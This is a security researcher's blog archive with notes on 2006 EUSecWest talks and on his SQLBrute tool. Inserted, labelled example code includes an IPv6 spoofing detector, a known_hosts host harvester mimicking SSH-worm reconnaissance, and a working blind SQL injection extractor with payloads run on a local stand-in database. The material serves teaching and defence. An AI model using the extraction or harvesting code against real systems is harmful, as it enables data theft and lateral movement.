
Speaking Archives


January 23, 2006

EUSecWest/core06

I just got a paper accepted at the upcoming EUSecWest conference in London on automated web application penetration techniques. Cool! Now I need to get my slide deck sorted out ...


February 19, 2006

EUSecWest/core06 coming up tomorrow...

The first annual EUSecWest conference (from the organisers of PacSec and CanSecWest) kicks off in London tomorrow. I'll be there, speaking on Tuesday, and blogging some detail about each of the talks. These are the talks that have been accepted:
  • van Hauser THC / n.runs GmbH
    Attacking the IPv6 protocol suite
  • Javier Burroni & Carlos Sarraute - Core Security Technologies
    Analyzing OS fingerprints using Neural Networks and Statistical Machinery
  • Nguyen Anh Quynh - Keio University
    XEBEK: A Next Generation Honeypot Monitoring System
  • Fred Raynal - EADS
    Malicious Crypto
  • Cesar Cerrudo - Argeniss
    Windows Local Shellcode Injection
  • Andrew Cushman - Microsoft
    Microsoft Security Fundamentals
  • Shreeraj Shah - Net Square
    Advanced Web Hacking - Attacks & Defense
  • Justin Clarke - Ernst & Young LLP
    Practical Automated Web Application Attack Techniques
  • Andy Davis - IRM PLC
    ColdFusion Security
  • Tim Hurman - Pentest Ltd.
    ARMed Combat: The Fight For Personal Security
  • Raffael Marty - ArcSight
    A Visual Approach to Security Event Management
  • Michael Boman - KPMG Singapore
    Network Security Monitoring: Theory and Practice
  • Jim DeLeskie & Danny McPherson - Teleglobe, Arbor Networks
    Protecting the Infrastructure
  • Andrea Barisani - Inverse Path
    Lessons in Open Source Security: The Tale of a 0-Day Incident
More details here tomorrow :-)


February 20, 2006

Day 1 of the EUSecWest/core06 security conference in London...

Here are my notes from day one of the first annual EUSecWest/core06 security conference in London:

van Hauser from The Hacker's Choice talked about IPv6 vulnerabilities, including the differences and similarities in performing certain types of attacks against IPv4 and IPv6, and some of the new issues raised by the introduction of IPv6. The presentation can be downloaded from here.

Some of the interesting highlights from my point of view were:
  • IPv6 is not in widespread use right now in Europe or the US (it is in Japan and South Korea).  A lot of the people using IPv6 (especially over IPv4) at the moment are Blackhats
  • A lot of the IPv4 reconnaissance techniques (such as ping sweeping) are not possible on IPv6 due to the number of IPs in the address space - DNS is going to become key in identifying systems
    • Once we can compromise a "public" server (i.e. one we can find through DNS) we can use IPv6 multicast to find systems on that subnet
    • OSPFv3 relies on IPsec for authentication, so we'd better be running it, or use another routing protocol
  • vh has written a toolset (library?) for testing IPv6, and created a whole host of tools as part of the IPv6 attack suite:
    • alive6 - for "alive" checking of hosts if you are on the local subnet. Ping sweeping the Internet for live hosts is not going to be feasible in an IPv6 world
    • parasite6 - for Man-in-the-middle attacks, leveraging weaknesses in the Neighbour Discovery protocol (the IPv6 replacement for ARP)
    • dos-new-ipv6 - for preventing people from joining the network by claiming all IPs are already taken
    • fake_router6 - for Man-in-the-middle attacks using Router Advertisements
    • smurf6 - local subnet DoS using multicast
    • rsmurf6 - remote DoS for broken Linux IPv6 implementations
    • redir6 - route implanting using "secure" ICMPv6 redirects
    • toobig6 - reduce a client's MTU
  • vh tested various IPv6 implementations (Windows XP SP2, Linux 2.6, OpenBSD, FreeBSD 5.3), and found that all of the implementations were vulnerable to one or more issues
  • Source routing may make a comeback, as all of the OSes tested passed on source routed packets, and these can be disguised by putting a fragmentation header in front of the routing packet, hence passing routers.
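The parasite6 and fake_router6 items above describe attacks on Neighbour Discovery and Router Advertisements; what a practitioner monitoring a subnet wants is the check that catches them. The following is an added example, not part of the original post and not code from the THC IPv6 attack suite: it builds a handful of NA and RA frames of the kind those tools emit (all addresses, MACs and the trusted-router list are constructed for the example), parses them back with the checksum and hop-limit checks a real receiver applies, and flags the two signatures: one target address claimed by more than one link-layer address, and a Router Advertisement from a MAC not on the allow-list.

```python
"""Added example: detect parasite6-style NA spoofing and fake_router6-style rogue RAs
over a batch of raw IPv6 frames constructed inline (no network access required)."""
import ipaddress
import struct

ICMPV6 = 58
RA, NA = 134, 136
O_FLAG = 0x20000000  # Neighbor Advertisement "override" bit (RFC 4861)


def _ones_complement_sum(data):
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return total


def icmpv6_checksum(src, dst, icmp):
    """RFC 4443 checksum over the IPv6 pseudo-header (src, dst, length, next header) plus the message."""
    pseudo = src + dst + struct.pack("!I3xB", len(icmp), ICMPV6)
    return (~_ones_complement_sum(pseudo + icmp)) & 0xFFFF


def _frame(src, dst, icmp):
    """Fill the checksum and prepend a fixed IPv6 header with hop limit 255, as ND requires."""
    icmp = icmp[:2] + struct.pack("!H", icmpv6_checksum(src, dst, icmp)) + icmp[4:]
    return struct.pack("!IHBB", 0x60000000, len(icmp), ICMPV6, 255) + src + dst + icmp


def _mac(text):
    return bytes.fromhex(text.replace(":", ""))


def build_na(src_ip, dst_ip, target_ip, mac, flags=0x60000000):
    """Neighbor Advertisement (S|O flags) with a Target Link-Layer Address option (type 2)."""
    src, dst = ipaddress.IPv6Address(src_ip).packed, ipaddress.IPv6Address(dst_ip).packed
    icmp = struct.pack("!BBHI", NA, 0, 0, flags) + ipaddress.IPv6Address(target_ip).packed
    icmp += struct.pack("!BB", 2, 1) + _mac(mac)
    return _frame(src, dst, icmp)


def build_ra(src_ip, mac, lifetime=1800):
    """Router Advertisement to ff02::1 (all nodes) with a Source Link-Layer Address option (type 1)."""
    src, dst = ipaddress.IPv6Address(src_ip).packed, ipaddress.IPv6Address("ff02::1").packed
    icmp = struct.pack("!BBHBBHII", RA, 0, 0, 64, 0, lifetime, 0, 0)
    icmp += struct.pack("!BB", 1, 1) + _mac(mac)
    return _frame(src, dst, icmp)


def _lladdr_option(opts, wanted):
    """Walk the ND options (8-byte units) and return the link-layer address of the wanted type."""
    while len(opts) >= 8:
        otype, olen = opts[0], opts[1] * 8
        if olen == 0:  # zero-length option is invalid; stop rather than loop forever
            return None
        if otype == wanted and olen == 8:
            return ":".join("%02x" % b for b in opts[2:8])
        opts = opts[olen:]
    return None


def parse_nd(frame):
    """Fields of an NA/RA frame, or None if it is not one or fails the ND sanity checks."""
    if len(frame) < 56 or frame[0] >> 4 != 6 or frame[6] != ICMPV6 or frame[7] != 255:
        return None
    plen = struct.unpack("!H", frame[4:6])[0]
    src, dst, icmp = frame[8:24], frame[24:40], frame[40:40 + plen]
    if len(icmp) != plen or len(icmp) < 16:
        return None
    zeroed = icmp[:2] + b"\x00\x00" + icmp[4:]
    if icmpv6_checksum(src, dst, zeroed) != struct.unpack("!H", icmp[2:4])[0]:
        return None
    if icmp[0] == NA and len(icmp) >= 24:
        target = str(ipaddress.IPv6Address(icmp[8:24]))
        flags = struct.unpack("!I", icmp[4:8])[0]
        lladdr = _lladdr_option(icmp[24:], 2)
    elif icmp[0] == RA:
        target, flags, lladdr = None, 0, _lladdr_option(icmp[16:], 1)
    else:
        return None
    return {"type": icmp[0], "src": str(ipaddress.IPv6Address(src)), "target": target,
            "lladdr": lladdr, "override": bool(flags & O_FLAG)}


def find_nd_attacks(frames, trusted_router_macs):
    """parasite6 signature: one target claimed by >1 MAC. fake_router6 signature: RA from an unlisted MAC."""
    claims, rogue_ras = {}, []
    for frame in frames:
        nd = parse_nd(frame)
        if nd is None or nd["lladdr"] is None:
            continue
        if nd["type"] == NA:
            claims.setdefault(nd["target"], set()).add(nd["lladdr"])
        elif nd["lladdr"] not in trusted_router_macs:
            rogue_ras.append((nd["src"], nd["lladdr"]))
    conflicts = {t: macs for t, macs in claims.items() if len(macs) > 1}
    return {"na_conflicts": conflicts, "rogue_ras": rogue_ras}


# Constructed sample traffic (addresses and MACs are made up for the example).
SAMPLE_FRAMES = [
    build_na("2001:db8::10", "2001:db8::1", "2001:db8::10", "00:11:22:33:44:55"),  # genuine host
    build_na("2001:db8::10", "2001:db8::1", "2001:db8::10", "de:ad:be:ef:00:01"),  # parasite6-style spoof
    build_na("2001:db8::20", "ff02::1", "2001:db8::20", "00:11:22:33:44:66"),      # unrelated, harmless
    build_ra("fe80::1", "00:11:22:33:44:01"),                                      # the real router
    build_ra("fe80::666", "de:ad:be:ef:00:01"),                                    # fake_router6-style rogue
]
TRUSTED_ROUTER_MACS = {"00:11:22:33:44:01"}

if __name__ == "__main__":
    print(find_nd_attacks(SAMPLE_FRAMES, TRUSTED_ROUTER_MACS))
```

A real monitor would feed frames in from a raw socket or a pcap rather than from `SAMPLE_FRAMES`; only the parse and detection logic is exercised here. Frames with a bad checksum, a hop limit other than 255 or a truncated payload are dropped silently, which is also what a host stack does with them.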

The next talk was by Barnaby Jack (from eEye Digital Security) about exploiting embedded systems.  This one was pretty interesting, and he was using a standard D-Link DI-604 broadband router as the exploit target.  Here are some notes:
  • A lot of embedded systems use ARM architectures, and real time OS's such as ThreadX
  • By using a JTAG emulator, and with some soldering, you can hook up a debugger to the device and start debugging the firmware as it runs
    • Because of the watchdog timer, the device may need a patch to prevent the watchdog from resetting the device
    • Modifying firmware involves figuring out how it is encoded and checksummed by the vendor - from debugging the web server code
  • The demo was pretty impressive
    • It used a LAN-side 0day bug in a function in the UPnP code for the router - the exploit removed the admin password, and enabled the external WAN side admin port
    • Uploaded modified firmware with a "payload" that modified every .exe file downloaded through the router (popped up a command prompt with "OWNED" on it)

Javier Burroni and Carlos Sarraute from CORE Security gave a quite interesting talk on using statistical methods and neural networks to more accurately determine operating system versions from the network.  They talked about a couple of different tools:
  • An improved DCE-RPC endpoint mapper, which much more reliably determined what Windows version and service pack was running
  • An OS detection tool using the nmap OS signature database, designed to reduce false positives and the "improbable" results that you can get with nmap:
    • a first neural network to determine whether it is a "relevant" OS or not (i.e. one we have exploits for)
    • a second neural network to determine what OS family the system is - i.e. Linux, Windows, OpenBSD, FreeBSD, NetBSD, Solaris
    • neural networks for each OS family to determine what version is running.

Nguyen Anh Quynh from Keio University in Japan (he is involved with development of Xen) gave a talk on next generation honeypot technology using Xen.

He talked about the weaknesses with Sebek in a honeynet environment - specifically that there are several ways to detect that you are in a honeypot, from detecting the presence of Sebek, to detecting the traffic that it sends on the network.

He then talked about "Xebek", which runs the honeypot systems as Xen virtual machines ("user domains"), with the Xebek server running in "Domain 0" (the host/first VM) on the machine.  Apparently this, together with patching the system calls in the kernel and using shared memory to pass data to the server, will fix most of the weaknesses with Sebek.

There was a spirited discussion in the Q&A about how detectable this approach will be versus the approach of Sebek.  Quynh did note that they are not attempting to hide the fact that the system is running in Xen, on the assumption that enough production systems will be running Xen that it will not be suspicious.

Frederick Raynal from the EADS Corporate Research Centre talked about the (ab)use of crypto.  This included discussion of a number of scenarios where crypto, humans, and trust could be abused, such as:
  • breaking the crypto (mis)used in the SuckIt rootkit versions 1 and 2 to take over a network of systems with SuckIt installed
  • using the trust relations, and information stored in a user's directory, to theorise the possibility of an SSH worm.  This included noting the use of existing sessions and other methods of capturing or leveraging existing access
  • methods/possibilities for preventing the analysis of a binary through the use of crypto, including differing situations over keys and decryption
  • scenarios for performing Man-in-the-Middle attacks against Skype.
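The SSH worm item above rests on what a user's ~/.ssh directory gives away: known_hosts is a ready-made target list. The following is an added example, not from the talk and not code from any real worm, showing the harvesting step in Python and what OpenSSH's `HashKnownHosts yes` changes about it. The known_hosts content is constructed for the example and the key blobs are placeholders; the hashed-entry format ("|1|salt|HMAC-SHA1", both base64) is the one OpenSSH writes.

```python
"""Added example: harvest hosts from a known_hosts file the way an SSH worm's
reconnaissance step would, and show what HashKnownHosts does and does not prevent."""
import base64
import hashlib
import hmac
import os


def hash_known_host(host, salt=None):
    """Build the "|1|<salt>|<hmac>" field OpenSSH writes with HashKnownHosts yes."""
    salt = salt if salt is not None else os.urandom(20)
    mac = hmac.new(salt, host.encode(), hashlib.sha1).digest()
    return "|1|%s|%s" % (base64.b64encode(salt).decode(), base64.b64encode(mac).decode())


def hashed_field_matches(field, candidate):
    """True if a hashed host field is the HMAC of candidate (constant-time compare)."""
    if not field.startswith("|1|"):
        return False
    _, _, salt_b64, mac_b64 = field.split("|", 3)
    expected = hmac.new(base64.b64decode(salt_b64), candidate.encode(), hashlib.sha1).digest()
    return hmac.compare_digest(expected, base64.b64decode(mac_b64))


def _host_fields(known_hosts):
    """Yield the host field (first token) of each real entry, skipping comments and markers."""
    for line in known_hosts.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("@"):  # @cert-authority / @revoked marker precedes the host field
            line = line.split(None, 1)[1]
        yield line.split(None, 1)[0]


def harvest_plaintext_hosts(known_hosts):
    """Hosts readable straight out of the file: what the worm gets for free."""
    hosts = []
    for field in _host_fields(known_hosts):
        if not field.startswith("|1|"):
            hosts.extend(h for h in field.split(",") if not h.startswith("!"))
    return hosts


def confirm_hashed_hosts(known_hosts, candidates):
    """With hashing on, an attacker can only confirm names it already has (shell history,
    ssh_config Host blocks, DNS), one HMAC per candidate per entry, not enumerate them."""
    hashed = [f for f in _host_fields(known_hosts) if f.startswith("|1|")]
    return {c for c in candidates if any(hashed_field_matches(f, c) for f in hashed)}


# Constructed sample; key material is a placeholder, the hashed entry uses a fixed salt.
SAMPLE_KNOWN_HOSTS = "\n".join([
    "# constructed sample known_hosts",
    "bastion.example.com,10.0.0.5 ssh-ed25519 AAAAC3placeholder",
    "[git.internal]:2222 ssh-rsa AAAAB3placeholder",
    hash_known_host("db.internal", salt=b"\x01" * 20) + " ssh-rsa AAAAB3placeholder",
    "@cert-authority *.corp.example ssh-rsa AAAAB3placeholder",
])

if __name__ == "__main__":
    print(harvest_plaintext_hosts(SAMPLE_KNOWN_HOSTS))
    print(confirm_hashed_hosts(SAMPLE_KNOWN_HOSTS, ["web01", "db.internal", "10.0.0.5"]))
```

Hashing is a speed bump rather than a wall: every entry keeps its own salt, so a worm has to run its wordlist against each line separately, but any name it can guess from elsewhere on the box is still confirmable, and agent forwarding and live sessions are unaffected by it.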

Cesar Cerrudo from Argeniss talked about Windows local shellcode injection.  The technique he was demonstrating was based on the use of LPC named ports.  You can see these things using Process Explorer from SysInternals.  He went through the process of connecting to a process's LPC port (including some of the problems, like how to find the name of the port), creating a shared memory section, and using the shared section to put shellcode into the process's memory space.  This also returns you a pointer to where the shellcode resides, making exploitation even easier, more portable, and Windows version independent.

Cesar then went through and demonstrated his exploits for MS05-12 and MS05-40 that leverage this approach.  

Andrew Cushman from Microsoft came and talked about the work that MS is putting in on the security front over their products.  Andrew went through a lot of the efforts that are going into Vista, as well as an interesting talk about the Microsoft response to the WMF bug.


February 21, 2006

Practical Automated Web Application Attack Techniques

Today I am speaking at the EUSecWest/core06 security conference in London on "Practical Automated Web Application Attack Techniques". You can find my presentation here.

Also, here are the example files, parseLog.pl (which for some reason is not on the O'Reilly site), simpleScanner.pl, and extendedScanner.pl.


Day 2 of the EUSecWest/core06 security conference in London...

The second and last day of EUSecWest has been and gone. It turned out to be a fun experience, with a lot of valuable and interesting information shared by the speakers, and a lot of interesting folks met at the conference. Here are my notes from the main speakers today (I haven't included the lightning talks or vendors because I was busy drinking beer by that stage...):

Shreeraj Shah from net-square talked about web application attacks and defences.  He introduced and demonstrated a number of tools he has written for the enumeration of information from the MSN Search engine, as well as some cool tools for web services testing and penetration, including:
  • MSNPawn - discovery and enumeration of information about HTTP hosts (including discovering running hosts by the server IP address) from querying using the MSN Search web service
  • MSNKnight - for building a profile about the site, by acting as a local proxy
  • wsPawn - for footprinting web services
  • wsKnight - for interacting with the web service using a WSDL file
  • wsAudit - for performing attack fuzzing on web services

Justin Clarke (me) from Ernst & Young talked about automating web application assessment and exploitation.  The talk seemed to go down fairly well.  I demonstrated some of the tools that were written for Network Security Tools, as well as one tool (SQLBrute) that is available from my site.  I also completely forgot to demonstrate one small tool (IEnterceptor)... whoops.

Andy Davis from Information Risk Management talked about ColdFusion security.  They have been doing a lot of research on version 7, 6.1 and 6.0 of CF, and talked about some of the issues (especially in the admin interface) that can be leveraged for nefarious purposes.  Some of the issues they found haven't been fixed yet (in the services etc that ship with CF), so we can look forward to more once Adobe release the fixes.

Tim Hurman from Pentest Limited talked about the security of personal ARM devices, such as common PDAs.  This covered some similar ground to Barnaby Jack's talk yesterday, with the difference that Tim was using JTAG to debug iPAQs and the like, and went on to demo an "always on" vulnerability in (I think) the vCal parsing via Bluetooth OBEX file transfer on a (I think) HP 5xxx iPAQ running Windows Mobile 2003.  The exploit popped up a nice window showing "0wn3d".  Tim mentioned how this type of issue could be used to formulate an "airborne virus" that you could pick up from an infected device, which would attack your desktop PC when in the sync cradle, and attack other mobile devices via Bluetooth when not attached.  Nice :-)

Raffael Marty from ArcSight talked about visual security event analysis using the Afterglow toolset.  Raff went through a number of visualisation examples, and these did look very useful for this type of application.  I will definitely be having a look into these sometime soon.

Michael Boman from KPMG Singapore talked about network security monitoring theory and practice, and also the SGUIL network monitoring console.  This looked pretty useful, and a possible alternative to some of the (expensive) commercial consoles that are becoming more available.

Jim DeLeskie from Teleglobe & Danny McPherson from Arbor Networks talked about securing the infrastructure from the point of view of the service provider.  This was pretty interesting to me as well, especially when talking about the provider techniques and limitations when responding (or not) to DDoS attacks.

Andrea Barisani from Inverse Path (and the Gentoo team) talked about the Gentoo rsync server compromise that happened in December 2003 (of a core portage rsync server), the detection of the compromise, analysis of what happened (including identification of the flaw in rsync), and the coordination of working with the rsync developers in fixing the flaw.  Very informative.


July 28, 2006

EUSecWest slides are available

Just to note that the slide decks from the EuSecWest/core06 conference earlier this year are now available. You can obtain them from the EuSecWest site. My slides are not currently up there, although they should be soon. In the mean time, my slides and examples are available on my site.

You can also refer back to my blogged coverage of Day 1 and Day 2 of the conference on this site. Enjoy!


June 28, 2007

SANS Brussels Community Night slides available

I've just got back from Brussels, after having spoken at the SANS Community Night last night on "Practical Automated Web Application Attack Techniques". You should now be able to download the slide deck, as well as the tools from Network Security Tools that I demonstrated - parseLog.pl (which for some reason is not on the O'Reilly site), simpleScanner.pl, and extendedScanner.pl.

You can also find SQLBrute, as well as my page showing an example of using SQLBrute (which is what I demoed) as well. Enjoy!
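SQLBrute, demoed here and mentioned in the Day 2 notes above, automates blind SQL injection: the application leaks nothing but a yes/no signal, and the tool turns that into data one bit at a time. The following is an added example of that extraction loop, written for this page rather than taken from SQLBrute (which targets MS SQL Server and Oracle, where the equivalent functions are ASCII()/SUBSTRING() and ASCII()/SUBSTR()); it uses an in-memory SQLite database as a stand-in target and a constructed users table, and runs the same payloads against a parameterised version of the query to show that the oracle then answers nothing.

```python
"""Added example: boolean-based blind SQL injection extraction of the kind SQLBrute
automates, against an in-memory SQLite stand-in, beside the parameterised query."""
import sqlite3


def make_db():
    """Constructed sample schema and data; the 'secret' column is what the attacker is after."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, secret TEXT)")
    conn.executemany("INSERT INTO users (name, secret) VALUES (?, ?)",
                     [("admin", "Winter2006!"), ("guest", "guest")])
    return conn


class Target:
    """A login-style check that only reveals whether a row came back: the blind oracle."""

    def __init__(self, conn, safe):
        self.conn, self.safe, self.queries = conn, safe, 0

    def user_exists(self, name):
        self.queries += 1
        if self.safe:
            cur = self.conn.execute("SELECT id FROM users WHERE name = ?", (name,))
        else:  # vulnerable: attacker-controlled text spliced straight into the SQL
            cur = self.conn.execute("SELECT id FROM users WHERE name = '%s'" % name)
        return cur.fetchone() is not None


def _search(is_greater, lo, hi):
    """Binary search: smallest v in [lo, hi] for which 'value > v' is false, i.e. the value."""
    while lo < hi:
        mid = (lo + hi) // 2
        if is_greater(mid):
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract(target, expr, known_user="admin", max_len=64):
    """Recover the string value of SQL expression `expr` from true/false answers only.
    Each payload closes the quoted name, appends a comparison and comments out the rest."""
    length = _search(
        lambda n: target.user_exists("%s' AND length(%s) > %d -- " % (known_user, expr, n)),
        0, max_len)
    chars = []
    for i in range(1, length + 1):
        code = _search(
            lambda c: target.user_exists(
                "%s' AND unicode(substr(%s,%d,1)) > %d -- " % (known_user, expr, i, c)),
            0, 127)  # ASCII range; widen the bound for non-ASCII data
        chars.append(chr(code))
    return "".join(chars)


def run_demo():
    """Returns (leaked value, queries used, value from the safe target, its query count)."""
    conn = make_db()
    expr = "(SELECT secret FROM users WHERE name='admin')"
    vuln, safe = Target(conn, safe=False), Target(conn, safe=True)
    leaked, n_vuln = extract(vuln, expr), vuln.queries
    nothing, n_safe = extract(safe, expr), safe.queries
    return leaked, n_vuln, nothing, n_safe


if __name__ == "__main__":
    print(run_demo())
```

Binary search is what keeps this practical: about seven requests per character rather than up to 128, which is the difference between a demo and a tool. Against the parameterised query every payload is just a user name that does not exist, so the length search collapses to zero and nothing comes back.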


May 16, 2008

Still alive and kicking...

I got an email this morning (and a comment on an IM conversation a week ago) that has continued to remind me that I've been neglecting this blog. So I thought I'd pen a quick update to let everyone know what's going on and coming up.

First of all, I got my turbo talk to Blackhat USA in Las Vegas accepted, so I'll be speaking there again for the first time since 2004. The paper is called "SQL Injection Worms for Fun and Profit", and appears to be even more timely than I expected when submitting it considering what is still an ongoing problem. I'll be in Vegas for both Blackhat and Defcon if anyone wants to plan a catch up.

In other news, I've made little progress on rewriting SQLBrute in .NET due to a lack of time. I am, however, going to release SQLBrute 1.1 in Python in the not too distant future - I'm adding Sybase support, and cleaning up a few of the routines. Also, check out the port of Microsoft's AntiXSS library to Java - you can check it out on the GDS Tools page.

That's all for now - more news and happenings soon!


May 21, 2008

The E&Y Alumni Blackhat?

As some of you may be aware, I used to work for the Ernst & Young Advanced Security Center in New York (and in Houston before that). Having a quick look at the speakers list for Blackhat in Las Vegas as they are confirmed it amused me that so many of the old E&Y ASC crew are represented in the speakers list:



About Speaking

This page contains an archive of all entries posted to justinclarke.com in the Speaking category. They are listed from oldest to newest.


Creative Commons License
This weblog is licensed under a Creative Commons License.